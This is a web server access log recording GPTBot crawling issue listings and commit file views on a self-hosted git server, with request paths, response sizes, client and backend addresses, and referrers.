"https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:56:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:56:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:56:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:56:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:56:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:56:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:56:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:56:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9828] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" +[17/Feb/2026:17:56:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:17:56:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 875] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" +[17/Feb/2026:17:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" +[17/Feb/2026:17:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:17:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11323] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:17:56:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11322] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:56:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11271] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:56:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:17:56:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:17:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:17:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:17:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11119] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:17:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json?display=source" [Client 74.7.227.38] [Length 12947] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:17:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:17:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:17:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11051] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11715] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" +[17/Feb/2026:17:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11286] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" +[17/Feb/2026:17:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11061] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" +[17/Feb/2026:17:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11687] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" +[17/Feb/2026:17:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11867] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" +[17/Feb/2026:17:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11716] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" +[17/Feb/2026:17:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11717] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" 